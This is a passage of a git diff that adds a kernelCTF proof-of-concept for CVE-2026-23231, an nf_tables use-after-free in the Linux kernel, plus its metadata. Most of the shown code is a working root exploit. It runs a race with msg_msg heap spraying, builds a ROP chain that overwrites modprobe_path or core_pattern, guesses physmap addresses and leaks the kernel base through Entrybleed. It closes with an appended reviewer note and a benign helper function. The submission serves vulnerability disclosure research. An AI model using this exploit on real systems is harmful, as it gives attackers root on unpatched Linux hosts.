hooks\n"); + return 1; + } + + if (!use_userblob) + rop_fill_physmap(); + spray_msgs(g_page_kva); + + int timeout = use_userblob ? 
RACE_DURATION_SEC * 10 + : RACE_DURATION_SEC * 3; + printf("[*] starting race (timeout=%ds)...\n", timeout); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, nullptr, race_udp_flood_thread, nullptr); + pthread_create(&t_spray, nullptr, race_spray_thread, + (void*)(uintptr_t)g_page_kva); + pthread_create(&t_race, nullptr, race_inet_chain_thread, + (void*)(uintptr_t)g_page_kva); + + time_t start = time(nullptr); + while (time(nullptr) - start < timeout && !race_won) { + // @sleep(desc="poll core_pattern every 2s during race") + sleep_ms(PARENT_POLL_MS); + if (setup_try_trigger()) { + race_won = 1; + break; + } + } + race_running = 0; + pthread_join(t_flood, nullptr); + pthread_join(t_race, nullptr); + pthread_join(t_spray, nullptr); + + if (!race_won && setup_try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + spray_free(); + if (use_userblob) { + printf("[-] userblob race did not win\n"); + return 1; + } + printf("[-] exact KVA race did not win\n"); + return 1; + } + + /* Physmap mode: the runner blocks pagemap. First try kbase-relative + * __init aliases as in the 521.98 exploit, then fall back to direct-map + * guesses. Each guessed KVA gets a fresh child so net namespace and nft + * state do not accumulate across failed candidates. 
+     */
+    if (try_init_alias_candidates())
+        return 0;
+
+    uint64_t primary_offsets[] = {
+        0x50000000ULL, /* 1.25 GB */
+        0x30000000ULL, /* 0.75 GB */
+        0x60000000ULL, /* 1.5 GB */
+        0x40000000ULL, /* 1.0 GB */
+        0x80000000ULL, /* 2.0 GB */
+        0x20000000ULL, /* 0.5 GB */
+        0x78000000ULL, /* 1.875 GB */
+        0x90000000ULL, /* 2.25 GB */
+        0xa0000000ULL, /* 2.5 GB */
+        0x70000000ULL, /* 1.75 GB */
+    };
+
+    printf("[*] phase1: primary phbase=%#lx, %zu KVAs [0.5-2.5GB]\n",
+           (unsigned long)phbase,
+           sizeof(primary_offsets) / sizeof(primary_offsets[0]));
+
+    for (size_t i = 0; i < sizeof(primary_offsets) / sizeof(primary_offsets[0]); i++) {
+        if (race_run_fresh_candidate(phbase + primary_offsets[i],
+                                     RACE_DURATION_SEC))
+            return 0;
+    }
+
+    size_t max_alt = n_phbase_cands < 5 ? n_phbase_cands : 5;
+    for (size_t i = 1; i < max_alt; i++) {
+        uint64_t pb = phbase_cands[i];
+        long delta_mb = (long)((int64_t)(pb - phbase) >> 20);
+        printf("[*] phase2: alt phbase=%#lx (%+ldMB)\n",
+               (unsigned long)pb, delta_mb);
+        if (race_run_fresh_candidate(pb + 0x60000000ULL,
+                                     RACE_DURATION_SEC))
+            return 0;
+    }
+
+    printf("[-] exploit failed\n");
+    return 1;
+}
+
+/* ================================================================
+ * TEST_ROP mode -- verify ROP blob and spray layout offline
+ * ================================================================ */
+// @step(name="TEST_ROP: Verify Blob Layout")
+static void rop_test_mode(void) {
+    printf("[*] TEST_ROP mode: verifying blob and spray layout\n");
+
+    if (!kbase) kbase = 0xffffffff81000000ULL;
+    if (!phbase) phbase = 0xffff888000000000ULL;
+    g_page_kva = phbase + 0x10000000ULL;
+
+    printf("[*] kbase = %#lx\n", (unsigned long)kbase);
+    printf("[*] phbase = %#lx\n", (unsigned long)phbase);
+    printf("[*] page_kva = %#lx\n", (unsigned long)g_page_kva);
+
+    uint8_t blob[256];
+    memset(blob, 0, sizeof(blob));
+    rop_build_blob(blob, g_page_kva);
+
+    printf("\n[*] ROP blob layout (0x98 bytes):\n");
+    printf(" +0x000 blob_size = %#lx\n", *(uint64_t*)(blob + 0x000));
+    printf(" +0x008 rdp0 = %#lx (dlen=%lu)\n",
+           *(uint64_t*)(blob + 0x008),
+           *(uint64_t*)(blob + 0x008) >> 1);
+    printf(" +0x010 expr0.ops = %#lx (nft_immediate_ops)\n",
+           *(uint64_t*)(blob + 0x010));
+    printf(" +0x018 expr0.d[0] = %#lx (pop_rsi_rdi)\n",
+           *(uint64_t*)(blob + 0x018));
+    printf(" +0x020 expr0.d[1] = %#lx (src_va = page_kva+0x%x)\n",
+           *(uint64_t*)(blob + 0x020), PATH_OFFSET);
+    printf(" +0x028 dreg=%-3u len=%u\n", blob[0x028], blob[0x029]);
+    printf(" +0x030 expr1.ops = %#lx (nft_immediate_ops)\n",
+           *(uint64_t*)(blob + 0x030));
+    printf(" +0x038 expr1.d[0] = %#lx (%s)\n",
+           *(uint64_t*)(blob + 0x038),
+           use_core_pattern ? "core_pattern" : "modprobe_path");
+    printf(" +0x040 expr1.d[1] = %#lx (strcpy)\n",
+           *(uint64_t*)(blob + 0x040));
+    printf(" +0x048 dreg=%-3u len=%u\n", blob[0x048], blob[0x049]);
+    printf(" +0x050 expr2.ops = %#lx (nft_immediate_ops)\n",
+           *(uint64_t*)(blob + 0x050));
+    printf(" +0x058 expr2.d[0] = %#lx (pop_rdi)\n",
+           *(uint64_t*)(blob + 0x058));
+    printf(" +0x060 expr2.d[1] = %#lx (MSLEEP_FOREVER)\n",
+           *(uint64_t*)(blob + 0x060));
+    printf(" +0x068 dreg=%-3u len=%u\n", blob[0x068], blob[0x069]);
+    printf(" +0x070 expr3.ops = %#lx (nft_immediate_ops)\n",
+           *(uint64_t*)(blob + 0x070));
+    printf(" +0x078 expr3.d[0] = %#lx (msleep)\n",
+           *(uint64_t*)(blob + 0x078));
+    printf(" +0x080 expr3.d[1] = %#lx (return_thunk)\n",
+           *(uint64_t*)(blob + 0x080));
+    printf(" +0x088 dreg=%-3u len=%u\n", blob[0x088], blob[0x089]);
+    printf(" +0x090 rdp1 = %#lx (end marker)\n",
+           *(uint64_t*)(blob + 0x090));
+
+    size_t bufsz = sizeof(long) + mtext_sz;
+    char *msgbuf = (char *)calloc(1, bufsz);
+    spray_build_msg(msgbuf, g_page_kva);
+    char *mtext = msgbuf + sizeof(long);
+
+    printf("\n[*] msg_msg spray layout (mtext offsets, MSG_MSG_SIZE=%lu):\n",
+           (unsigned long)MSG_MSG_SIZE);
+    uint64_t bg0, bg1;
+    memcpy(&bg0, mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN0 - MSG_MSG_SIZE), 8);
+    memcpy(&bg1, mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN1 - MSG_MSG_SIZE), 8);
+    printf(" mtext[%lu] (alloc+%lu) policy = %u (expect 1=NF_ACCEPT)\n",
+           NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_POLICY,
+           (unsigned)mtext[NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE]);
+    printf(" mtext[%lu] (alloc+%lu) blob_gen_0 = %#lx\n",
+           NFT_BASE_CHAIN_OFFS_BLOB_GEN0 - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_BLOB_GEN0,
+           (unsigned long)bg0);
+    printf(" mtext[%lu] (alloc+%lu) blob_gen_1 = %#lx\n",
+           NFT_BASE_CHAIN_OFFS_BLOB_GEN1 - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_BLOB_GEN1,
+           (unsigned long)bg1);
+    printf(" mtext[%lu] (alloc+%lu) flags = 0x%02x (expect 0x01=NFT_CHAIN_BASE)\n",
+           NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_FLAGS,
+           (unsigned)mtext[NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE]);
+
+    int ok = 1;
+    if (bg0 != g_page_kva) { printf("[-] MISMATCH: blob_gen_0 != page_kva\n"); ok = 0; }
+    if (bg1 != g_page_kva) { printf("[-] MISMATCH: blob_gen_1 != page_kva\n"); ok = 0; }
+    if (mtext[NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE] != 1) { printf("[-] MISMATCH: policy != 1\n"); ok = 0; }
+    if (mtext[NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE] != 0x01) { printf("[-] MISMATCH: flags != 0x01\n"); ok = 0; }
+
+    printf("\n[*] Computed addresses:\n");
+    printf(" target (%s) = %#lx\n",
+           use_core_pattern ? "core_pattern" : "modprobe_path",
+           (unsigned long)(kbase + (use_core_pattern ? off_core_pattern : off_modprobe)));
+    printf(" nft_imm_ops = %#lx\n", (unsigned long)(kbase + off_nft_imm_ops));
+    printf(" pop_rsi_rdi = %#lx\n",
+           (unsigned long)(kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK));
+    printf(" strcpy = %#lx\n", (unsigned long)(kbase + off_strcpy));
+    printf(" msleep = %#lx\n", (unsigned long)(kbase + off_msleep));
+    printf(" pop_rdi = %#lx\n", (unsigned long)(kbase + OFF_POP_RDI_JMP_RETURN_THUNK));
+    printf(" return_thunk = %#lx\n", (unsigned long)(kbase + off_return_thunk));
+    printf(" src_va (path) = %#lx\n", (unsigned long)(g_page_kva + PATH_OFFSET));
+
+    printf("\n[%c] TEST_ROP %s\n", ok ? '+' : '-', ok ? "PASSED" : "FAILED");
+    free(msgbuf);
+}
+
+/* ================================================================
+ * Entry point
+ * ================================================================ */
+int main(int argc, char **argv) {
+    /* Initialize kernelXDK -- resolve offsets from target database */
+    xdk_init_offsets();
+
+    /* Compute mtext_sz from (resolved) MSG_MSG_SIZE */
+    mtext_sz = 256 - MSG_MSG_SIZE; /* kmalloc-256 allocation */
+
+    /* TEST_ROP mode: verify blob/spray layout without running race */
+    if (getenv("TEST_ROP")) {
+        kbase = env_u64("KBASE");
+        phbase = env_u64("PHYSBASE");
+        rop_test_mode();
+        return 0;
+    }
+
+    setup_auto_physmap_size();
+
+    int smap_present = setup_check_smap();
+    if (!smap_present) {
+        printf("[+] SMAP not detected -- using userspace blob\n");
+        use_userblob = 1;
+    } else {
+        printf("[*] SMAP detected -- using physmap approach\n");
+    }
+
+    kbase = env_u64("KBASE");
+    phbase = env_u64("PHYSBASE");
+
+    /* kernelCTF repro with requires_separate_kaslr_leak=true appends
+     * "nokaslr -- kaslr_leak=1"; init.sh passes the kallsyms text base
+     * as argv. It does not pass a direct-map base, so derive that from
+     * nokaslr below. */
+    int verifier_trigger_arg = 0;
+    for (int i = 1; i < argc; i++) {
+        if (strcmp(argv[i], "--vuln-trigger") == 0) {
+            verifier_trigger_arg = 1;
+            continue;
+        }
+        if (kbase)
+            continue;
+        uint64_t cli_kbase = 0;
+        if (parse_u64_arg(argv[i], &cli_kbase)) {
+            if (cli_kbase == 0 && kernel_cmdline_has_token("nokaslr")) {
+                cli_kbase = KTEXT_SCAN_START;
+                printf("[*] argv kbase was 0; using nokaslr fallback %#lx\n",
+                       (unsigned long)cli_kbase);
+            }
+            kbase = cli_kbase;
+            printf("[+] argv kbase=%#lx\n", (unsigned long)kbase);
+        } else {
+            printf("[!] ignoring unparsable argv kbase: %s\n", argv[i]);
+        }
+    }
+
+    if (kernel_cmdline_has_token("nokaslr")) {
+        if (!kbase) {
+            kbase = KTEXT_SCAN_START;
+            printf("[*] nokaslr detected; using fixed kbase=%#lx\n",
+                   (unsigned long)kbase);
+        }
+        if (!phbase) {
+            phbase = DIRECT_MAP_START;
+            printf("[*] nokaslr detected; using fixed phbase=%#lx\n",
+                   (unsigned long)phbase);
+        }
+    }
+    if (verifier_trigger_arg) {
+        printf("[*] verifier --vuln-trigger mode enabled\n");
+        return vuln_trigger_main();
+    }
+
+    if (kbase && phbase) {
+        n_kbase_cands = 1;
+        kbase_cands[0] = kbase;
+        n_phbase_cands = 1;
+        phbase_cands[0] = phbase;
+    }
+    if (use_userblob) {
+        if (!kbase && !leak_entrybleed())
+            return 1;
+        if (!kbase) {
+            printf("[-] Entrybleed failed for kbase\n");
+            return 1;
+        }
+        phbase = 0xffff888000000000ULL;
+    } else {
+        if ((!kbase || !phbase) && !leak_entrybleed())
+            return 1;
+        if (!kbase || !phbase) {
+            fprintf(stderr, "[-] need KBASE and PHYSBASE\n");
+            return 1;
+        }
+    }
+    printf("[+] kbase = %#lx\n", (unsigned long)kbase);
+    printf("[+] phbase = %#lx\n", (unsigned long)phbase);
+    if (use_userblob)
+        printf("[+] blob = userspace @ %#lx\n",
+               (unsigned long)USERBLOB_ADDR);
+
+    setup_payload();
+
+    pid_t child = fork();
+    if (child < 0) die("fork");
+    if (child == 0)
+        _exit(exploit_main());
+
+    for (int t = 0; t < PARENT_POLL_ITERATIONS; t++) {
+        // @sleep(desc="poll core_pattern every 2s during race")
+        sleep_ms(PARENT_POLL_MS);
+
+        if (setup_try_trigger()) {
+            printf("\n[+] ===== GOT ROOT =====\n");
+            kill(child, SIGKILL);
+            waitpid(child, nullptr, WNOHANG);
+            return 0;
+        }
+
+        int status;
+        pid_t p = waitpid(child, &status, WNOHANG);
+        if (p > 0) {
+            printf("[*] child exited (status=%d)\n",
+                   WIFEXITED(status) ? WEXITSTATUS(status) : -1);
+            for (int i = 0; i < POST_EXIT_POLLS; i++) {
+                if (setup_try_trigger()) {
+                    printf("\n[+] ===== GOT ROOT =====\n");
+                    return 0;
+                }
+                // @sleep(desc="wait for modprobe handler to execute")
+                sleep_ms(POST_EXIT_POLL_MS);
+            }
+            break;
+        }
+    }
+
+    kill(child, SIGKILL);
+    waitpid(child, nullptr, 0);
+
+    printf("[-] exploit did not achieve root\n");
+    return 1;
+}
diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/target_db.kxdb
new file mode 100644
index 000000000..b47d2547a
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/target_db.kxdb differ
diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23231_cos/metadata.json
new file mode 100644
index 000000000..1675c49e9
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/metadata.json
@@ -0,0 +1,32 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+    "submission_ids": ["exp449"],
+    "vulnerability": {
+        "summary": "Use-after-free in nf_tables_addchain() error path due to missing synchronize_rcu() between nft_chain_del() and nf_tables_chain_destroy()",
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=71e99ee20fc3f662555118cf1159443250647533",
+        "cve": "CVE-2026-23231",
+        "affected_versions": [
+            "3.16 - 6.1.164",
+            "6.2 - 6.6.127",
+            "6.7 - 6.12.74",
+            "6.13 - 6.18.13",
+            "6.19 - 6.19.3"
+        ],
+        "requirements": {
+            "attack_surface": ["userns"],
+            "capabilities": ["CAP_NET_ADMIN"],
+            "kernel_config": [
+                "CONFIG_NETFILTER",
+                "CONFIG_NF_TABLES",
+                "CONFIG_NF_TABLES_INET"
+            ]
+        }
+    },
+    "exploits": {
+        "cos-113-18244.521.88": {
+            "uses": ["userns"],
+            "requires_separate_kaslr_leak": true,
+            "stability_notes": "Probabilistic race. The exploit is submitted with the kernelCTF separate KASLR leak path enabled. In repro this adds nokaslr and passes the kallsyms-derived kernel text base to the exploit when available; if kallsyms is hidden and the argv value is zero, the exploit uses a nokaslr fallback. The exploit uses the fixed nokaslr direct-map base in this mode. The standalone prefetch side-channel leak path remains available outside repro."
+        }
+    }
+}
diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23231_cos/original.tar.gz
new file mode 100644
index 000000000..05fcd6e35
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23231_cos/original.tar.gz differ
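
Reviewer note on the `stability_notes` text: the kernel text base is taken from the `KBASE` environment override, then from argv, then from the fixed `nokaslr` value. The sketch below restates that order as a small, testable C++ helper. It is an illustration only, not the code in `exploit_xdk.cpp`: `resolve_kbase` and `cmdline_has_token` are hypothetical names, this `parse_u64_arg` is a stand-in whose real implementation is not shown in the patch, and the constant assumes `KTEXT_SCAN_START` equals the `0xffffffff81000000` value quoted in the write-up.

```cpp
#include <cassert>
#include <cctype>
#include <cerrno>
#include <cstdint>
#include <cstdlib>
#include <string>

// Hypothetical stand-in for parse_u64_arg(): accepts decimal, 0-prefixed
// octal, or 0x-prefixed hex. Input must start with a digit, so empty
// strings, signs, and tokens such as "kaslr_leak=1" are rejected.
static bool parse_u64_arg(const char *s, uint64_t *out) {
    assert(out != nullptr);
    if (!s || !std::isdigit(static_cast<unsigned char>(*s))) return false;
    errno = 0;
    char *end = nullptr;
    unsigned long long v = std::strtoull(s, &end, 0);
    if (errno != 0 || end == s || *end != '\0') return false;  // overflow or trailing junk
    *out = static_cast<uint64_t>(v);
    return true;
}

// Hypothetical whole-token match against a whitespace-separated command
// line, for example the contents of /proc/cmdline.
static bool cmdline_has_token(const std::string &cmdline, const std::string &tok) {
    std::size_t pos = 0;
    while (pos < cmdline.size()) {
        std::size_t end = cmdline.find_first_of(" \t\n", pos);
        if (end == std::string::npos) end = cmdline.size();
        if (cmdline.compare(pos, end - pos, tok) == 0) return true;
        pos = end + 1;
    }
    return false;
}

// Resolution order: environment override, then argv, then the fixed
// nokaslr text base. Returns 0 when nothing applies, meaning a separate
// leak would still be required.
static uint64_t resolve_kbase(const char *env_kbase, const char *argv_kbase,
                              const std::string &cmdline) {
    const uint64_t kNokaslrTextBase = 0xffffffff81000000ULL;  // assumed value
    uint64_t v = 0;
    if (env_kbase && parse_u64_arg(env_kbase, &v) && v != 0) return v;
    if (argv_kbase && parse_u64_arg(argv_kbase, &v) && v != 0) return v;
    if (cmdline_has_token(cmdline, "nokaslr")) return kNokaslrTextBase;
    return 0;
}
```

Passing the command line as a string rather than reading `/proc/cmdline` inside the helper keeps the fallback order checkable on any host, including the case where kallsyms is hidden and argv carries `0`.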